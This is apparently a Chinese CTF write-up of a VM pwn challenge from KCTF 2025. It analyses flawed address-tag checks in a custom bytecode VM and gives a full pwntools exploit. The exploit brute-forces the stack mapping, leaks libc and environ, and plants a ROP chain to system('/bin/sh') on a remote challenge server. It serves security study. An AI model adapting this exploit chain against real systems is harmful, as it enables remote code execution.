Ikoct的饮冰室

你愿意和我学一辈子二进制吗?

0%

记一次VMPWN分析

本题为KCTF 2025第八题, 做这题的时候上网查找VMPWN相关资料发现基本都是一些把vm布置在栈上或明显的越界漏洞, 本题的漏洞点很少而且做完之后确实学到了新东西, 故作此记录

初步分析

程序实现了一个虚拟机, 有自己的栈和内存区, 虚拟机的内存段被固定映射到0x200000, 代码区被随机映射:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
vm *do_malloc()
{
vm *vm; // rbx
vm *vm_1; // rbx
vm *vm_2; // rbx
vm *vm_3; // rbx
vm *vm_4; // rax

alarm(0x64u);
vm = (vm *)zalloc(0x28u);
vm->PC = 0;
vm = vm;
vm->text = zmmap(0, 0x1000u);
vm_1 = vm;
vm_1->mem = zmmap((void *)0x200000, 0x1000u);
vm_2 = vm;
vm_2->regs = zalloc(0x40u);
vm_3 = vm;
vm_3->stack = zalloc(0x800u);
vm_4 = vm;
vm->SP = 0;
return vm_4;
}

相关结构体:

1
2
3
4
5
6
7
8
9
struct vm
{
_DWORD PC;
_DWORD SP;
_BYTE *stack;
_BYTE *mem;
_BYTE *text;
_QWORD *regs;
};

写个脚本导出函数让AI分析各个操作码对应的操作(我到底什么时候能用上MCP啊):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import ida_funcs, ida_hexrays

start = 0x0000000000001314
end = 0x0000000000002A64

func = set()

while start <= end:
f = ida_funcs.get_func(start)
if f and f.start_ea not in func:
func.add(f.start_ea)
with open('funcs.txt', 'a') as file:
file.write(ida_hexrays.decompile(f).__str__() + '\n')
start += 1
Opcode 原函数 作用 建议命名
0x00 sub_1314 从寄存器 chunk4[rN] 压栈 op_push_reg
0x01 sub_13AA 压常数到栈 op_push_imm
0x02 sub_141B 压常数地址解引用的值到栈 op_push_mem
0x03 sub_1494 栈顶弹出 → 存到寄存器 rN op_pop_reg
0x04 sub_1532 r[dst] = r[src](寄存器间拷贝) op_mov_reg_reg
0x05 sub_15AC r[dst] = imm(立即数写寄存器) op_mov_reg_imm
0x06 sub_1600 r[dst] = r[dst] + r[src](带溢出检查) op_add_reg_reg
0x07 sub_1787 r[dst] += imm op_add_reg_imm
0x08 sub_1864 r[dst] = r[dst] - r[src] op_sub_reg_reg
0x09 sub_19EB r[dst] -= imm op_sub_reg_imm
0x0A sub_1AC8 r[dst] *= r[src] op_mul_reg_reg
0x0B sub_1C53 r[dst] *= imm op_mul_reg_imm
0x0C sub_1D34 r[dst] /= r[src] op_div_reg_reg
0x0D sub_1EC0 r[dst] /= imm op_div_reg_imm
0x0E sub_1FA2 r[dst] &= r[src] op_and_reg_reg
0x0F sub_2129 r[dst] &= imm op_and_reg_imm
0x10 sub_2206 r[dst] |= r[src] op_or_reg_reg
0x11 sub_238D r[dst] |= imm op_or_reg_imm
0x12 sub_246A r[dst] ^= r[src] op_xor_reg_reg
0x13 sub_25F1 r[dst] ^= imm op_xor_reg_imm
0x14 sub_26CE r[dst] = *r[src](寄存器作为指针解引用 load) op_load_mem
0x15 sub_2782 *r[addr] = r[value](store) op_store_mem
0x16 sub_2831 if (r[a] > r[b]) pc += imm(条件跳转) op_jmp_gt
0x17 sub_28ED if (r[a] < r[b]) pc += imm op_jmp_lt
0x18 sub_29A9 if (r[a] == r[b]) pc += imm op_jmp_eq
0x19 - 结束程序 op_halt

同时拷打AI写出汇编工具:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
# asmbuilder.py
# Tiny bytecode builder for the 8-byte-per-instruction VM.

import struct
from typing import Dict, List, Tuple, Union

# --- Registers (VM 里 min(..., 8u),保守支持 0..8) ---
R0, R1, R2, R3, R4, R5, R6, R7, R8 = range(9)

def _clamp_reg(r: int) -> int:
if r < 0: return 0
if r > 8: return 8
return r

def _ins(op: int, b1: int = 0, b2: int = 0, imm: int = 0) -> bytes:
"""
通用编码器:|op|b1|b2|pad0|imm32_le|
"""
return bytes([op & 0xFF, _clamp_reg(b1) & 0xFF, _clamp_reg(b2) & 0xFF, 0]) + struct.pack("<I", imm & 0xFFFFFFFF)

# --- Stack / register moves ---
def push_reg(src_reg: int) -> bytes: # opcode 0x00: 从寄存器压栈(读 +2) :contentReference[oaicite:3]{index=3}
return _ins(0x00, 0, src_reg, 0)

def push(imm: int) -> bytes: # opcode 0x01: 压 32 位立即数(读 +4) :contentReference[oaicite:4]{index=4}
return _ins(0x01, 0, 0, imm)

def push_ptr(addr32: int) -> bytes: # opcode 0x02: 压“指针”风味立即数(执行期做 tag/转换) :contentReference[oaicite:5]{index=5}
return _ins(0x02, 0, 0, addr32)

def pop_reg(dst_reg: int) -> bytes: # opcode 0x03: 栈顶弹出到寄存器(写 +1) :contentReference[oaicite:6]{index=6}
return _ins(0x03, dst_reg, 0, 0)

def mov_reg_reg(dst_reg: int, src_reg: int) -> bytes: # opcode 0x04: r[dst]=r[src](读 +1/+2) :contentReference[oaicite:7]{index=7}
return _ins(0x04, dst_reg, src_reg, 0)

def mov_reg_imm(dst_reg: int, imm: int) -> bytes: # opcode 0x05: r[dst]=imm(读 +1,+4) :contentReference[oaicite:8]{index=8}
return _ins(0x05, dst_reg, 0, imm)

# --- ALU (reg/reg & reg/imm) ---
def add_reg_reg(dst: int, src: int) -> bytes: # 0x06 :contentReference[oaicite:9]{index=9}
return _ins(0x06, dst, src, 0)

def add_reg_imm(dst: int, imm: int) -> bytes: # 0x07 :contentReference[oaicite:10]{index=10}
return _ins(0x07, dst, 0, imm)

def sub_reg_reg(dst: int, src: int) -> bytes: # 0x08 :contentReference[oaicite:11]{index=11}
return _ins(0x08, dst, src, 0)

def sub_reg_imm(dst: int, imm: int) -> bytes: # 0x09 :contentReference[oaicite:12]{index=12}
return _ins(0x09, dst, 0, imm)

def mul_reg_reg(dst: int, src: int) -> bytes: # 0x0A :contentReference[oaicite:13]{index=13}
return _ins(0x0A, dst, src, 0)

def mul_reg_imm(dst: int, imm: int) -> bytes: # 0x0B :contentReference[oaicite:14]{index=14}
return _ins(0x0B, dst, 0, imm)

def div_reg_reg(dst: int, src: int) -> bytes: # 0x0C :contentReference[oaicite:15]{index=15}
return _ins(0x0C, dst, src, 0)

def div_reg_imm(dst: int, imm: int) -> bytes: # 0x0D :contentReference[oaicite:16]{index=16}
return _ins(0x0D, dst, 0, imm)

# --- Bitwise ---
def and_reg_reg(dst: int, src: int) -> bytes: # 0x0E :contentReference[oaicite:17]{index=17}
return _ins(0x0E, dst, src, 0)

def and_reg_imm(dst: int, imm: int) -> bytes: # 0x0F :contentReference[oaicite:18]{index=18}
return _ins(0x0F, dst, 0, imm)

def or_reg_reg(dst: int, src: int) -> bytes: # 0x10 :contentReference[oaicite:19]{index=19}
return _ins(0x10, dst, src, 0)

def or_reg_imm(dst: int, imm: int) -> bytes: # 0x11 :contentReference[oaicite:20]{index=20}
return _ins(0x11, dst, 0, imm)

def xor_reg_reg(dst: int, src: int) -> bytes: # 0x12 :contentReference[oaicite:21]{index=21}
return _ins(0x12, dst, src, 0)

def xor_reg_imm(dst: int, imm: int) -> bytes: # 0x13 :contentReference[oaicite:22]{index=22}
return _ins(0x13, dst, 0, imm)

# --- Memory ---
def load_mem(dst_reg: int, src_ptr_reg: int) -> bytes: # 0x14: r[dst]=*r[src_ptr](读 +1/+2) :contentReference[oaicite:23]{index=23}
return _ins(0x14, dst_reg, src_ptr_reg, 0)

def store_mem(addr_reg: int, value_reg: int) -> bytes: # 0x15: *r[addr]=r[value](读 +1/+2) :contentReference[oaicite:24]{index=24}
return _ins(0x15, addr_reg, value_reg, 0)

# --- Control flow (PC 从下一条起算 += imm32;自然语义只支持向前偏移) ---
def jmp_gt(ra: int, rb: int, delta: int) -> bytes: # 0x16 :contentReference[oaicite:25]{index=25}
return _ins(0x16, ra, rb, delta)

def jmp_lt(ra: int, rb: int, delta: int) -> bytes: # 0x17 :contentReference[oaicite:26]{index=26}
return _ins(0x17, ra, rb, delta)

def jmp_eq(ra: int, rb: int, delta: int) -> bytes: # 0x18 :contentReference[oaicite:27]{index=27}
return _ins(0x18, ra, rb, delta)

def halt() -> bytes: # 0x19
return _ins(0x19, 0, 0, 0)

# --------------------------------------------------------------------
# Label-aware builder (可选):支持 jmp_* 到标签名,会在 finalize() 时求偏移
# --------------------------------------------------------------------
JumpSpec = Tuple[int, int, int, str] # (opcode, ra, rb, label)

class ProgramBuilder:
def __init__(self):
self.buf = bytearray()
self.labels: Dict[str, int] = {}
self.fixups: List[Tuple[int, JumpSpec]] = [] # (ins_index, spec)

def pc(self) -> int:
"""返回当前指令号(每条 8 字节)。"""
return len(self.buf) // 8

def emit(self, ins: bytes) -> "ProgramBuilder":
assert isinstance(ins, (bytes, bytearray)) and len(ins) == 8
self.buf += ins
return self

def label(self, name: str) -> "ProgramBuilder":
self.labels[name] = self.pc()
return self

# 绑定标签的跳转(偏移从下一条起算:delta = label_idx - (ins_idx + 1))
def jmp_gt(self, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
return self._jmp_op(0x16, ra, rb, target)

def jmp_lt(self, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
return self._jmp_op(0x17, ra, rb, target)

def jmp_eq(self, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
return self._jmp_op(0x18, ra, rb, target)

def _jmp_op(self, op: int, ra: int, rb: int, target: Union[int, str]) -> "ProgramBuilder":
ins_idx = self.pc()
if isinstance(target, int):
self.emit(_ins(op, ra, rb, target))
else:
# 先放占位 0,记录修正信息
self.emit(_ins(op, ra, rb, 0))
self.fixups.append((ins_idx, (op, ra, rb, target)))
return self

def finalize(self) -> bytes:
# 回填标签跳转偏移
for ins_idx, (_, ra, rb, label) in self.fixups:
if label not in self.labels:
raise KeyError(f"Undefined label: {label}")
label_idx = self.labels[label]
delta = label_idx - (ins_idx + 1) # 从“下一条”起算 :contentReference[oaicite:28]{index=28}
# 写回 imm32(小端)
pos = ins_idx * 8 + 4
self.buf[pos:pos + 4] = struct.pack("<I", delta & 0xFFFFFFFF)
self.fixups.clear()
return bytes(self.buf)

# --- 简短别名,方便直接拼接 ---
# 例如:bytecode = b""; bytecode += push(123); bytecode += pop_reg(R0); bytecode += halt()

程序中所有涉及到数组的操作都对下标进行了检验, 有关下标唯一的漏洞我只在push_imm里找到一个, 在栈指针自增后是先进行赋值再检验下标的, 可以越界访问1个qword, 但是我不知道有什么用.

另外程序还对地址值有检验, 要通过vm来执行类似mov [r0], r1的操作时会对r0检验其最高位是否置1, 这是vm对有效地址打的tag, 同时通过运算得出的地址(通过是否带tag来判断)会检测其是否在vm的栈和内存段的合法区域, 不在的话会强制转化为内存段的初始位置.

程序漏洞

而在限制运算得到地址这一点上程序对寄存器之间的运算和寄存器与立即数之间的运算是不同的, 以乘法为例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
unsigned __int64 __fastcall mul_reg_reg(__int64 a1)
{
unsigned __int64 result; // rax
_QWORD *v2; // rbx
unsigned __int8 v3; // [rsp+14h] [rbp-Ch]
char v4; // [rsp+15h] [rbp-Bh]
unsigned __int8 v5; // [rsp+16h] [rbp-Ah]
char v6; // [rsp+17h] [rbp-9h]

v3 = min(*(unsigned __int8 *)(a1 + 1), 8u);
v4 = isaddr(vm->regs[v3]);
v5 = min(*(unsigned __int8 *)(a1 + 2), 8u);
v6 = isaddr(vm->regs[v5]);
result = vm->regs[v5] * vm->regs[v3];
vm->regs[v3] = result;
if ( v4 || v6 )
{
if ( v4 && v6 )
{
result = (unsigned __int64)&vm->regs[v3];
*(_QWORD *)result &= ~0x8000000000000000LL;
}
else
{
v2 = &vm->regs[v3];
result = check_addr(*v2 & 0x7FFFFFFFFFFFFFFFLL);
*v2 = result;
}
}
return result;
}

unsigned __int64 __fastcall mul_reg_imm(__int64 a1)
{
unsigned __int64 result; // rax
_QWORD *v2; // rbx
unsigned __int8 v3; // [rsp+17h] [rbp-9h]

v3 = min(*(unsigned __int8 *)(a1 + 1), 8u);
vm->regs[v3] *= *(unsigned int *)(a1 + 4);
result = isaddr(vm->regs[v3]);
if ( (_BYTE)result )
{
v2 = &vm->regs[v3];
result = check_addr(*v2 & 0x7FFFFFFFFFFFFFFFLL);
*v2 = result;
}
return result;
}

寄存器之间的运算只会在运算前寄存器本身就是带tag的地址值才会进行检测, 而和立即数的运算会在运算完后检测算出的结果是否为地址值并检测合法性.

另外一点就出在check_addr上:

1
2
3
4
5
6
7
unsigned __int64 __fastcall check_addr(__int64 a1)
{
if ( a1 - (unsigned __int64)vm->mem <= 0xFF8 || a1 - (unsigned __int64)vm->stack <= 0x7F8 )
return a1 | 0x8000000000000000LL;
else
return (unsigned __int64)vm->mem | 0x8000000000000000LL;
}

本来只需要检验地址是否落在固定映射的mem上就好了, stack本身是随机映射的, 用户不应该能得到其地址值.

获得vm栈段被映射到的地址

综合以上两点可以通过爆破的方式得到stack被映射到的地址, 伪代码如下:

1
2
3
4
5
6
7
8
9
mov r1, start
mov r3, mem
l1:
add r2, 0x1000
mov r0, r1
mul r0, 2
add r0, r2
cmp r0, mem
je l1

调试可以发现vm栈段被映射到的地址低12位是320h:

QQ_1756608060869

最高1字节就选定为0x55, 只需要爆破中间56位即可, bytecode如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
from asmbuilder import *

context.arch = 'amd64'
elf = ELF('./pwn')
# so = ELF('/home/i/PC_File/libs/2.35-0ubuntu3.9_amd64/libc.so.6')
so = ELF('./libc.so.6')
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))

def write_qword(qword, reg):
bc = b''
q1, q2, q3 = qword >> 32, (qword >> 16) & 0xffff, qword & 0xffff
bc += mov_reg_imm(reg, q1)
bc += mul_reg_imm(reg, 1 << 16)
bc += or_reg_imm(reg, q2)
bc += mul_reg_imm(reg, 1 << 16)
bc += or_reg_imm(reg, q3)
return bc

def tag(reg):
bc = b''
bc += div_reg_imm(reg, 2)
bc += mov_reg_imm(7, 1 << 31)
bc += mul_reg_reg(7, 7)
bc += or_reg_reg(reg, 7)
bc += mul_reg_reg(reg, 4)
return bc

guess_start = (0x550000000320 | (1 << 63)) >> 1
pop_rdi = 0x000000000002a3e5

bc = b''
bc += push_reg(0)
bc += write_qword(guess_start, 1)
bc += push_ptr(0)
bc += pop_reg(3)
bc += mov_reg_imm(4, 2)
# l1
bc += add_reg_imm(2, 0x1000)
bc += mov_reg_reg(0, 1)
bc += mul_reg_reg(0, 4)
bc += add_reg_reg(0, 2)
bc += jmp_eq(0, 3, -5)
# jump to l1 if r0 == r3
# Now the vm-stack | TAG is stored in reg[0]

上面说过寄存器和立即数的运算会导致检测地址, 所以这里存起来的实际上是(TAG | addr) >> 1, 在要算出地址时与存放了2r4做乘法即可得到带tag地址且不会被检测, 这一步在本机上的爆破时间不超过5秒, 但是靶机很可能程序给的100秒alarm都不够用, 要多尝试几次, 至此我们获得了任意已知地址读写的能力.

泄露libc地址

在得到了一个堆地址后就好办很多了, 注意到开头push了两次吗? 现在只需要将堆上vm代码段的地址放入vm的栈基址中, 再进行一次pop操作就能将一个mmap出的地址送入寄存器中, 而mmap出的地址与ld间有固定偏移:

QQ_1756608507445

而ld中存放了大量libc中的地址:

QQ_1756608554799

这里就选择这个_dl_catch_exception, 它与mem段的偏移为0x3018, 这一步的bytecode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bc += mov_reg_reg(1, 0)
bc += mov_reg_reg(3, 0)
bc += and_reg_imm(1, 0xffff) # r1 = vm-stack's high 4 bytes
bc += div_reg_imm(0, 1 << 16)
bc += and_reg_imm(0, 0xffffffff) # r0 = vm-stack's low 8 bytes

bc += mul_reg_imm(0, 1 << 16)
bc += or_reg_reg(0, 1) # r0 = vm-stack
bc += mov_reg_reg(2, 0)
bc += sub_reg_imm(2, 0x68)
bc += div_reg_imm(3, 2)
bc += sub_reg_imm(3, 0x78 // 2)
bc += mul_reg_reg(3, 4) # r3 = &vm-stack | TAG
bc += store_mem(3, 2)
bc += pop_reg(0) # r0 = vm-text

bc += add_reg_imm(0, 0x3018)
bc += tag(0) # r0 = &vm-text | TAG
bc += load_mem(1, 0)
bc += sub_reg_imm(1, so.sym['_dl_catch_exception']) # r1 = libc-base

泄露原生栈地址

程序开启了got表保护, 不用思考改got来getshell了, 我的想法是通过libc中的environ泄露栈地址来修改函数返回地址写入ROP链, 这一步的bytecode:

1
2
3
4
5
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, so.sym['environ'])
bc += tag(2) # r2 = environ | TAG
bc += load_mem(2, 2) # r2 = stack
bc += sub_reg_imm(2, 0x130) # r2 = ret-addr

写入ROP

接下来就没什么好说的了, 写入返回到system(‘/bin/sh’)的ROP链, 这里直接返回上去栈会不对齐, 要多放一个ret

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
from pwn import *
from asmbuilder import *

context.arch = 'amd64'
elf = ELF('./pwn')
# so = ELF('/home/i/PC_File/libs/2.35-0ubuntu3.9_amd64/libc.so.6')
so = ELF('./libc.so.6')
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda num=4096 :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))

def write_qword(qword, reg):
bc = b''
q1, q2, q3 = qword >> 32, (qword >> 16) & 0xffff, qword & 0xffff
bc += mov_reg_imm(reg, q1)
bc += mul_reg_imm(reg, 1 << 16)
bc += or_reg_imm(reg, q2)
bc += mul_reg_imm(reg, 1 << 16)
bc += or_reg_imm(reg, q3)
return bc

def tag(reg):
bc = b''
bc += div_reg_imm(reg, 2)
bc += mov_reg_imm(7, 1 << 31)
bc += mul_reg_reg(7, 7)
bc += or_reg_reg(reg, 7)
bc += mul_reg_reg(reg, 4)
return bc
# guess_start = (0x550000000320 | (1 << 63)) >> 1
guess_start = (0x550000000320 | (1 << 63)) >> 1
pop_rdi = 0x000000000002a3e5

bc = b''
bc += push_reg(0)
bc += write_qword(guess_start, 1)
bc += push_ptr(0)
bc += pop_reg(3)
bc += mov_reg_imm(4, 2)
# l1
bc += add_reg_imm(2, 0x1000)
bc += mov_reg_reg(0, 1)
bc += mul_reg_reg(0, 4)
bc += add_reg_reg(0, 2)
bc += jmp_eq(0, 3, -5)
# jump to l1 if r0 == r3
# Now the vm-stack | TAG is stored in reg[0]

bc += mov_reg_reg(1, 0)
bc += mov_reg_reg(3, 0)
bc += and_reg_imm(1, 0xffff) # r1 = vm-stack's high 4 bytes
bc += div_reg_imm(0, 1 << 16)
bc += and_reg_imm(0, 0xffffffff) # r0 = vm-stack's low 8 bytes

bc += mul_reg_imm(0, 1 << 16)
bc += or_reg_reg(0, 1) # r0 = vm-stack
bc += mov_reg_reg(2, 0)
bc += sub_reg_imm(2, 0x68)
bc += div_reg_imm(3, 2)
bc += sub_reg_imm(3, 0x78 // 2)
bc += mul_reg_reg(3, 4) # r3 = &vm-stack | TAG
bc += store_mem(3, 2)
bc += pop_reg(0) # r0 = vm-text

bc += add_reg_imm(0, 0x3018)
bc += tag(0) # r0 = &vm-text | TAG
bc += load_mem(1, 0)
bc += sub_reg_imm(1, so.sym['_dl_catch_exception']) # r1 = libc-base
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, so.sym['environ'])
bc += tag(2) # r2 = environ | TAG
bc += load_mem(2, 2) # r2 = stack
bc += sub_reg_imm(2, 0x130) # r2 = ret-addr

bc += store_mem(3, 2)
# Now the stack of vm is pointing to the return address

# Start building the ROP-chain
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, pop_rdi + 1)
bc += push_reg(2)
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, pop_rdi)
bc += push_reg(2)
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, next(so.search(b'/bin/sh')))
bc += push_reg(2)
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, so.sym['system'])
bc += push_reg(2)

bc += halt()

while True:
try:
# p = remote('localhost', 20000)
p = remote('123.57.66.184', 10083)
s(bc)

sl(b'ls')
p.recvuntil(b'pwn', timeout=110)
itr()
except:
continue

总结

做出这题的关键在于意识到扫描整个堆地址空间的可能性, 因为粗略计算一下需要爆破的56位大概是亿级水平, 以往的需要爆破的pwn都是本机发指令爆破, 而这里我们需要自己构造一个虚拟机来在远端直接爆破, 实际上自己写一个C程序验证一下, 循环一亿次的时间其实很短, 爆破的可能性是完全存在的.